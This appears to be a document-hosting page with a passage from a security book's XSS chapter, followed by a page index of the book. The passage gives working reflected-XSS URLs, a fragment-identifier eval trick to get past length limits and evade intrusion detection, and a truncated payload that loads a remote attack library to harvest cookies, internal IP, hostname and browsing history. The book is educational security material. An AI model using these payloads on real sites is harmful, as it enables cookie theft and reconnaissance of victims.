Download

More documents

Recommendations

Info

Technically, inside the IMG tag, the first two quotes should be considered encapsulationand should do nothing.The next quote should allow encapsulation and go to the next quotewhich is after the tag. Lastly, it should be closed by the trailing end anglebracket. Notice I said “should.” Not one of the major browsers, such as, IE, Firefox,Netscape, or Opera handles it like that.They all feel like this is malformed HTML andattempt to fix it. In Figure 4.36 you see the Firefox WebDeveloper View Generated Sourceoutput.Figure 4.36 The Result Code For After the InjectionXSS Theory • Chapter 4 145Not only did Firefox add the tags again, but this time it stripped parameters;namely the parameters that would have made this a safe thing to enter into a Web site.To be fair, all the browsers tested do the same thing, making them all unsafe when facedwith this vector. Again, our theoretical Web application developer has been fooled not by theHTML itself, but by how the browser’s render that same code.Bypassing XSS Length LimitationsThere are a number of techniques we can use in order to fit more characters in XSS vulnerablefields than the maximum allowed. In this section, we are going to play with fragmentidentifiers and XSS payloads in order to circumvent maximum field length restrictions andalso bypass intrusion detection and preventing systems.First of all, let’s examine a hypothetical XSS vulnerability, which is defined like this:http://www.acme.com/path/to/search.asp?query=">[payload]Look carefully at the part near the [payload].The first two characters of the queryparameter close any open element attribute and the element body, which is followed by thepayload. In order to exploit the vulnerability, we can do something as simple as this:http://www.acme.com/path/to/search.asp?query=">alert('xss')This is enough to prove that the application is vulnerable to XSS, but will it be enoughif we want to create a proper exploit? That might not be the case.The hypothetical applicationsanitizes the length of the query parameter in a way that only 60 characters are allowed.Obviously, our injection is highly limited if we only have tha number of characters.
146 Chapter 4 • XSS TheoryGranted, we are still able to perform injection of a remote script via:http://www.acme.com/path/to/search.asp?query=">However, this approach is not suitable in situations requiring stealth and anonymity, notto mention that we rely on an external server to provide the malicious logic, which can beeasily blocked. So, what other options do we have?If you investigate all other possible ways of injecting JavaScript into a sanitized field youwill see that there are not that many options available. However, with a simple trick we canconvert reflected XSS vulnerability into a DOM-based XSS issue.This is achieved like this:http://www.acme.com/path/to/search.asp?query=">eval(location.hash.substr(1))#alert('xss')Let’s examine the exploit. First of all, the value of the query field is within the restrictionsof the application: our code is only 48 characters. Notice that in the place of the [payload]we have eval(location.hash.substr(1)), which calls the JavaScript evalfunction on the hash parameter.The hash, also known as the fragment identifier, is data thatfollows the # sign, which in our case is alert(‘xss’).NOTEFragment identifiers are mechanisms for referring to anchors in Web pages.The anchor is a tag to which ‘hash’ is an id attribute. If we have a long pagethat contains several chapters of a book, we may want to create links withinthe page so we can get to the top, the bottom, and the middle of the contentquicker. These links are called anchors.By using this technique, we can put as much data as we want and the application willbelieve that only 48 characters are injected. For example, let’s create a massive attack:http://www.acme.com/path/to/search.asp?query=">eval(location.hash.substr(1))#function include(url,onload){varscript=document.createElement('script');script.type='text/javascript';script.onload=onload;script.src=url;document.body.appendChild(script)};include('http://www.gnucitizen.org/projects/attackapi/AttackAPI-standalone.js',function(){vardata={agent:$A.getAgent(),platform:$A.getPlatform(),cookies:$A.buildQuery($A.getCookies()),plugins:$A.getPlugins().join(','),ip:$A.getInternalIP(),hostname:$A.getInternalHostname(),extensions:[],states:[],history:[]};varcompleted=0;$A.scanExtensions({onfound:function(signature){data.extensions.push(signature.name)},oncomplete:function(){completed+=1}});$A.scanStates({onfound:function(signature){data.states.push(signature.name)},oncomplete:function(){completed+=1}});$A.scanHistory({onfound:function(url){data.history.push(url)},oncomplete:function(){completed+=1}});vartmr=window.setInterval(function(){if(completed
Page 1 and 2:
www.dbebooks.com - Free Books & mag
Page 3 and 4:
Elsevier, Inc., the author(s), and
Page 6 and 7:
ForewordDr. Richard Ford graduated
Page 8 and 9:
http://www.info-secure.org and seve
Page 10 and 11:
Jeremiah Grossman founded WhiteHat
Page 12 and 13:
ContentsForeword . . . . . . . . .
Page 14 and 15:
ContentsxvChapter 4 XSS Theory. . .
Page 16 and 17:
ContentsxviiReal-Life Examples . .
Page 18 and 19:
ContentsxixSummary . . . . . . . .
Page 20:
ContentsxxiRegulatory Requirements
Page 23 and 24:
xxivForewordgain somehow from it or
Page 26 and 27:
Chapter 1Botnets:A Call to ActionSo
Page 28 and 29:
This book will attempt to add new s
Page 30 and 31:
Consider the power in one botnet at
Page 32 and 33:
SubSeven Trojan/BotBy the late 1990
Page 34 and 35:
sites. In 2002, the motivation for
Page 36 and 37:
Botnets: A Call to Action • Chapt
Page 38 and 39:
MytobThe Mytob bot was discovered i
Page 40 and 41:
the FBI who tracked down the hacker
Page 42 and 43:
Anthony Scott ClarkIn December 2005
Page 44 and 45:
Botnets: A Call to Action • Chapt
Page 46 and 47:
2007. In these meetings, a clearer
Page 48 and 49:
Chapter 2Botnets OverviewIf only it
Page 50 and 51:
standing of the botnet life cycle c
Page 52 and 53:
Backdoors Left by TrojanWorms or Re
Page 54 and 55:
Botnets Overview • Chapter 2 31Fi
Page 56 and 57:
Botnets Overview • Chapter 2 33ve
Page 58 and 59:
Botnets Overview • Chapter 2 35ec
Page 60 and 61:
Recruit OthersThe most basic thing
Page 62 and 63:
■HTTP_USER_FIELDS.LST■ICQ.LST
Page 64 and 65:
Page 66 and 67:
Installation of Adware and Clicks4H
Page 68 and 69:
The Botnet-Spam and Phishing Connec
Page 70 and 71:
need that many.These calculations a
Page 72 and 73:
Page 74 and 75:
Botnets Overview • Chapter 2 51Ac
Page 76 and 77:
RansomwareAs a category this includ
Page 78 and 79:
of the card, the ATM pin number, an
Page 80 and 81:
Botnets Overview • Chapter 2 57th
Page 82 and 83:
agree to purchase links, if Google
Page 84 and 85:
Botnets Overview • Chapter 2 61Th
Page 86 and 87:
Botnets Overview • Chapter 2 63Fr
Page 88:
Part IICross SiteScripting Attacks6
Page 91 and 92:
68 Chapter 3 • Cross-site Scripti
Page 93 and 94:
Page 95 and 96:
Page 97 and 98:
Page 99 and 100:
Page 101 and 102:
Page 104 and 105:
Chapter 4XSS TheorySolutions in thi
Page 106 and 107:
To describe methods 1 and 2 above,
Page 108 and 109:
Figure 4.3 illustrates what happens
Page 110 and 111:
Once the hacker has completed his e
Page 112 and 113:
This is where the problem is. In th
Page 114 and 115:
XSS Theory • Chapter 4 91Awesomea
Page 116 and 117:
XSS Theory • Chapter 4 93Notice t
Page 118 and 119: AwesomeAwesomeawesome ajax applicat
Page 120 and 121: AwesomeAwesomeawesome ajax applicat
Page 122 and 123: the application that is developed.
Page 124 and 125: XSS Theory • Chapter 4 101a redir
Page 126 and 127: include the phishing site in questi
Page 128 and 129: tinyurl.com/2z8ghb). Using somethin
Page 130 and 131: tain that the administrator was, in
Page 132 and 133: server. Because JavaScript is a ful
Page 134 and 135: 203.135.128.187 - - [15/Mar/2007:09
Page 136 and 137: Once you download MTASC, you have t
Page 138 and 139: XSS Theory • Chapter 4 115NOTEIf
Page 140 and 141: XSS Theory • Chapter 4 117These t
Page 142 and 143: Again, if you are running the lates
Page 144 and 145: This is the reason why alert messag
Page 146 and 147: XSS Theory • Chapter 4 123}.repla
Page 148 and 149: In order for the attacker to take a
Page 150 and 151: Unfortunately, even if Google remov
Page 152 and 153: XSS Theory • Chapter 4 129if (typ
Page 154 and 155: file that can be clicked when the f
Page 156 and 157: Click only once on the Text Track n
Page 158 and 159: Backdooring Image FilesIt is a less
Page 160 and 161: application ignores .htm and .html
Page 162 and 163: XSS Theory • Chapter 4 139NOTEDep
Page 164 and 165: XSS Theory • Chapter 4 141Figure
Page 166 and 167: Firefox is not the only one. Now, l
Page 170 and 171: ions.join(',');data.states=data.sta
Page 172 and 173: XSS Theory • Chapter 4 14948 0 49
Page 174 and 175: XSS Theory • Chapter 4 151var que
Page 176 and 177: Obviously, this code should not app
Page 178 and 179: 14. onBegin() The onbegin event fir
Page 180 and 181: 62. onMove() The user or attacker w
Page 182 and 183: XSS Theory • Chapter 4 159While t
Page 184 and 185: XSS Theory • Chapter 4 161&#X3c&#
Page 186 and 187: Since the number is lower than 10,
Page 188 and 189: There is no doubt that some HTML is
Page 190 and 191: XSS Theory • Chapter 4 167NOTEThe
Page 192 and 193: }alert("XSS");The .htc vector only
Page 194 and 195: XSS Theory • Chapter 4 171?script
Page 196 and 197: SummaryIn this chapter, we discusse
Page 198 and 199: XSS Theory • Chapter 4 175Source
Page 200 and 201: Chapter 5XSS Attack MethodsSolution
Page 202 and 203: XSS Attack Methods • Chapter 5 17
Page 204 and 205: Stealing Search Engine QueriesSPI D
Page 206 and 207: sole to error where they can be cap
Page 212 and 213: iframe.setAttribute("src", "/");ifr
Page 214 and 215: Port ScanningWith the internal IP a
Page 218 and 219:
cading style sheets (CSS), or JavaS
Page 220 and 221:
will update the device. For example
Page 222 and 223:
application that uses innerHTML or
Page 224 and 225:
XSS Attack Methods • Chapter 5 20
Page 226 and 227:
XSS Attack Methods • Chapter 5 20
Page 228:
Part IIIPhysical and LogicalSecurit
Page 231 and 232:
208 Chapter 6 • Protecting Critic
Page 233 and 234:
Page 235 and 236:
Page 237 and 238:
Page 239 and 240:
Page 241 and 242:
Page 243 and 244:
Page 245 and 246:
Page 247 and 248:
Page 249 and 250:
Page 251 and 252:
Page 253 and 254:
Page 255 and 256:
Page 257 and 258:
Page 259 and 260:
Page 261 and 262:
Page 263 and 264:
Page 265 and 266:
Page 267 and 268:
Page 269 and 270:
Page 271 and 272:
Page 273 and 274:
Page 275 and 276:
Page 277 and 278:
254 Chapter 7 • Final ThoughtsInt
Page 279 and 280:
256 Chapter 7 • Final Thoughts■
Page 281 and 282:
258 Chapter 7 • Final Thoughts■
Page 284 and 285:
Chapter 8Why PCI IsImportantSolutio
Page 286 and 287:
Why PCI Is Important • Chapter 8
Page 288 and 289:
Page 290 and 291:
Page 292 and 293:
Page 294 and 295:
Co published the updated DSS, now a
Page 296 and 297:
■■■Maintain a Vulnerability M
Page 298 and 299:
Page 300 and 301:
SummaryPCI refers to the DSS establ
Page 302 and 303:
Chapter 9ProtectCardholder DataSolu
Page 304 and 305:
Protect Cardholder Data • Chapter
Page 306 and 307:
Full Disk EncryptionFull disk encry
Page 308 and 309:
Protect Cardholder Data • Chapter
Page 310 and 311:
OverviewThe pursuit of protecting d
Page 312 and 313:
allow traffic through your firewall
Page 314 and 315:
modern standard Web browser is all
Page 316 and 317:
SegmentationSegmentation essentiall
Page 318 and 319:
Intrusion Detection Systems (IDSes)
Page 320 and 321:
Step 4—Develop PoliciesBased On W
Page 322 and 323:
SummaryProtect Cardholder Data •
Page 324 and 325:
Sensitive cardholder authentication
Page 326:
Part VAsterisk andVoIP Hacking303
Page 329 and 330:
306 Chapter 10 • Understanding an
Page 331 and 332:
Page 333 and 334:
Page 335 and 336:
Page 337 and 338:
Page 339 and 340:
Page 341 and 342:
Page 343 and 344:
Page 345 and 346:
Page 347 and 348:
Page 349 and 350:
Page 351 and 352:
Page 353 and 354:
Page 355 and 356:
Page 357 and 358:
Page 359 and 360:
336 Chapter 11 • Asterisk Hardwar
Page 361 and 362:
Page 363 and 364:
Page 365 and 366:
Page 367 and 368:
Page 369 and 370:
Page 371 and 372:
Page 373 and 374:
Page 375 and 376:
Page 377 and 378:
Page 379 and 380:
Page 381 and 382:
Page 383 and 384:
Page 385 and 386:
Page 387 and 388:
Page 389 and 390:
Page 391 and 392:
Page 393 and 394:
Page 395 and 396:
Page 397 and 398:
Page 400 and 401:
Chapter 12Social EngineeringSolutio
Page 402 and 403:
privisp1002.htm) Jan Dulaney, presi
Page 404 and 405:
To make your own hardware keystroke
Page 406 and 407:
Social Engineering • Chapter 12 3
Page 408 and 409:
TheftA 2005 survey conducted by the
Page 410 and 411:
these files may be copied into fold
Page 412 and 413:
Sometimes people choose poor passwo
Page 414 and 415:
There are times when an attacker wa
Page 416 and 417:
Phreak BoxesAnother way to get free
Page 418 and 419:
transferred callers to a 1-900 numb
Page 420 and 421:
on a hyperlink appearing in a SMS m
Page 422 and 423:
Page 424 and 425:
Page 426 and 427:
Just as information systems authent
Page 428 and 429:
Page 430 and 431:
different vulnerabilities that each
Page 432 and 433:
no advance knowledge of the company
Page 434 and 435:
The Computer Security Act establish
Page 436 and 437:
Page 438 and 439:
Page 440 and 441:
Things change. New assets are acqui
Page 442 and 443:
Quantitative AssessmentImagine all
Page 444 and 445:
Page 446 and 447:
Download the S.O.B. Orangebox archi
Page 448 and 449:
Page 450 and 451:
NOTE: In this index, a page numberf
Page 452 and 453:
Index 429perpetrators, 15-20, 51-52
Page 454 and 455:
Index 431Default passwords, 29, 197
Page 456 and 457:
Index 433GPRS (General Packet Radio
Page 458 and 459:
Index 435Left bracket (
Page 460 and 461:
Index 437Qualified Security Assesso
Page 462 and 463:
Index 439SCADA (Supervisory Control
Page 464 and 465:
Index 441Threats to process control
show all

Download

You also want an ePaper? Increase the reach of your titles

Delete template?

Save as template?